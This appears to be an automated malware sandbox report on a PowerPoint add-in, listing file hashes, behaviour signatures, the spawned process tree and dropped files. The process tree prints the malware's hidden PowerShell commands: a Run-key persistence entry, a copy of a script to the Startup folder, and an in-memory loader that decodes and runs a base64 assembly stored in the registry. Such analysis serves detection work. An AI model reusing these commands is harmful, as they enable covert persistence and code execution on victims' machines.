Analysis

  • max time kernel
    67s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    10-10-2024 07:25

General

  • Target

    Documentosrs.ppam

  • Size

    17KB

  • MD5

    640ac4d0699d074c8a7e9a08ee88773e

  • SHA1

    d11670a056e4014f9b7a14719a5d3fd81405c029

  • SHA256

    faae26cbd0ceae86240be0129ce6a9e18236a6db8c321ce37e06966392e78b64

  • SHA512

    bb0f743d16b79d5c4634a786b92bdd1546de5afbaa56bb7a5d47fd8b4dd2e4715ff01a7970849638b4d5a5d3029edf2acd122fbc360868c3f5ea102c68efe3a4

  • SSDEEP

    384:dXPtggC+rvh/t3vzVWnON2ZfrmPaggDI06t2QUVDp:VPtvC+r5lzVLNYjmPabDIgVl

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Documentosrs.ppam"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2952
      • C:\Windows\SysWOW64\wscript.exe
        wscript C:\Users\Admin\AppData\Roaming/RG.js
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value 'C:\Users\Admin\AppData\Roaming\RG.js' -PropertyType String -Force;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1700
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\RG.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\RG.js'))"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:568
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2700

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Cab216.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar2D4.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      7cd933e21cc4cad6ef844e4d401105c4

      SHA1

      afa8531b2ce8f536a88420c66c87a68baa5c63e4

      SHA256

      cf164d840df71fb567b16a65f1a9fe55389d21f32ed13c64830e194a1ef4a25a

      SHA512

      c1ae2c1ea680540eb3f1544a75547baf09393f7766072f6b76db05474d05f0d7a6280b7c5d193928d24a0135caf359fb00b1cfc89f681f1169cd23581e1dc692

    • C:\Users\Admin\AppData\Roaming\RG.js

      Filesize

      60KB

      MD5

      dce39f51f2677748f77792f70d277dc1

      SHA1

      7fb251f50249f3d8962cc21b430c3ae9920031d2

      SHA256

      8d5edf251a3075a591ce31722558350739561ea7bca7b0bb3f5db646c16727cd

      SHA512

      3bf8b128104db8a12a45ea969f48f037f6f74833313e3f54b60224c75793b101a55d097821f23881c8169a18e5a850141a1ff5a4d33845a9b4bb61633018938d

    • memory/2604-0-0x000000002D8D1000-0x000000002D8D2000-memory.dmp

      Filesize

      4KB

    • memory/2604-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2604-2-0x0000000071F3D000-0x0000000071F48000-memory.dmp

      Filesize

      44KB

    • memory/2604-6-0x0000000005740000-0x0000000005840000-memory.dmp

      Filesize

      1024KB

    • memory/2604-5-0x0000000005590000-0x0000000005690000-memory.dmp

      Filesize

      1024KB

    • memory/2604-62-0x0000000071F3D000-0x0000000071F48000-memory.dmp

      Filesize

      44KB

    • memory/2604-63-0x0000000005590000-0x0000000005690000-memory.dmp

      Filesize

      1024KB